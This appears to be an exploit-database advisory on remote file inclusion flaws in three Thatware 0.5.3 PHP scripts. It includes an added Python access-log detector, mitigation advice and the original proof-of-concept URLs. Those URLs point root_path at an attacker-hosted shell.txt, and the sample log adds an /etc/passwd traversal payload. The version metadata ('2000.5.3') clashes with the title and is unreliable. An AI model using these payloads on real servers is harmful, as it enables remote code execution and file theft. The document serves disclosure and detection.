Vendor: Thatware
Discovered by: cr4wl3r
CVSS: 7.5 (HIGH)
Vulnerability class: Remote File Include
CWE: CWE-98
Product Name: Thatware
Affected Version From: 2000.5.3
Affected Version To: 2000.5.3
Patch Exists: YES
Related CWE: N/A
CPE: thatware
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

Thatware <= 0.5.3 Multiple Remote File Include Exploit

Thatware is vulnerable to multiple remote file inclusion (RFI) vulnerabilities. In three scripts the variable $root_path is used as the prefix of an include path but is never assigned before use, so on a PHP configuration with register_globals enabled an attacker can supply it from the query string. In config.php (line 4) it is concatenated with db_settings.php; in artlist.php (line 28) with thatfile.php; and in thatfile.php (line 130) with config.php, guarded only by a file_exists() check on the same attacker-controlled path. Setting root_path to a URL such as http://[attacker]/shell.txt??? makes PHP fetch the attacker's file and execute it on the server; the trailing question marks turn the filename that PHP appends into part of the remote URL's query string, so the attacker's web server still serves shell.txt. Remote inclusion therefore requires register_globals (off by default since PHP 4.2, removed in PHP 5.4) together with allow_url_include (introduced in PHP 5.2; before that, allow_url_fopen) to be enabled. Where URL includes are disabled but register_globals is on, the same parameter still allows local file inclusion, since root_path can be pointed at any local directory.
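The requests described above leave a clear trace in web server access logs. The following detector is an added example, not part of the advisory or of Thatware; it parses combined-format log lines (a constructed sample is embedded, using documentation IP ranges) and flags any request whose root_path value carries a URL wrapper, a directory-traversal sequence or a null byte, marking whether the target script is one of the three named in the advisory. The script names, log format and detection rules are this example's own assumptions.

```python
"""Flag remote/local file-include attempts against Thatware's $root_path sink
in combined-format web server access logs (added example, not project code)."""
import re
from urllib.parse import parse_qs, urlsplit

# Scripts the advisory names as reaching the include sink; any other script
# that receives root_path is still reported, but marked as not a known sink.
KNOWN_SINK_SCRIPTS = {"config.php", "artlist.php", "thatfile.php"}
SINK_PARAM = "root_path"

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Stream wrappers PHP resolves over the network (or from the request body)
# when allow_url_include is enabled.
REMOTE_WRAPPER_RE = re.compile(r"^(https?|ftps?|data|php)://", re.IGNORECASE)


def classify_value(value):
    """Return the reasons a root_path value looks like an include attack ([] if benign)."""
    reasons = []
    if REMOTE_WRAPPER_RE.match(value):
        reasons.append("remote include (URL wrapper)")
    if "../" in value or "..\\" in value:
        reasons.append("local include (directory traversal)")
    if "\x00" in value:  # %00 in the request; truncates the appended filename on old PHP
        reasons.append("null-byte truncation")
    return reasons


def parse_line(line):
    """Parse one combined-format log line into ip/status/script/query, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "status": m.group("status"),
        "script": target.path.rsplit("/", 1)[-1],
        # keep_blank_values so a bare "root_path=" probe is still visible
        "query": parse_qs(target.query, keep_blank_values=True),
    }


def scan(lines):
    """Return one hit per request whose root_path value matches an attack pattern."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for value in rec["query"].get(SINK_PARAM, []):
            reasons = classify_value(value)
            if reasons:
                hits.append({
                    "ip": rec["ip"],
                    "script": rec["script"],
                    "status": rec["status"],
                    "value": value,
                    "reasons": reasons,
                    "known_sink": rec["script"] in KNOWN_SINK_SCRIPTS,
                })
    return hits


# Constructed sample log; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2009:10:15:01 +0000] "GET /thatware/config.php?root_path=http://198.51.100.7/shell.txt??? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2009:10:15:03 +0000] "GET /thatware/artlist.php?root_path=../../../../etc/passwd%00 HTTP/1.1" 200 1210 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Mar/2009:10:16:10 +0000] "GET /thatware/artlist.php?id=3 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Mar/2009:10:16:12 +0000] "GET /thatware/index.php?root_path=http://198.51.100.7/x.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["script"], hit["status"], repr(hit["value"]),
              ", ".join(hit["reasons"]),
              "(known sink)" if hit["known_sink"] else "(other script)")
```

A 200 response to a remote-wrapper request is the case to triage first: it means the server fetched and ran the attacker's file, so the host should be treated as compromised rather than merely probed. The null-byte rule is kept because %00 was the common way to drop the appended filename on PHP releases that still allowed it.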

Mitigation:

Update to the latest version of Thatware, which contains the vendor's fix. Until the upgrade is applied, initialize $root_path to the application's own directory at the top of each affected script instead of leaving it to be populated from the request, and harden the PHP configuration: set register_globals = Off so a query-string value can no longer reach the include sink, and allow_url_include = Off (and allow_url_fopen = Off where nothing else needs it) so a URL cannot be included even if it does.

Exploit-DB raw data:

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Thatware <= 0.5.3 Multiple Remote File Include Exploit
#Download Script  :  http://sourceforge.net/projects/thatware/files
########################################################################
#
#Vuln : ./thatware_path/config.php (line 4)
#
#      <?php
#        include $root_path."db_settings.php";
#      ?>
#
#PoC  :  http://server/config.php?root_path=http://[attacker]/shell.txt???
#
#Vuln : ./thatware_path/artlist.php (line 28)
#
#      <?php
#        include $root_path.'thatfile.php';
#      ?>
#
#PoC  :  http://server/artlist.php?root_path=http://[attacker]/shell.txt???
#
#Vuln : ./thatware_path/thatfile.php (line 130)
#
#      <?php
#        if(file_exists($root_path.'config.php'))
#          include($root_path.'config.php');
#      ?>
#
#PoC  :  http://server/thatfile.php?root_path=http://[attacker]/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################


   [ Gorontalo / 2009 ]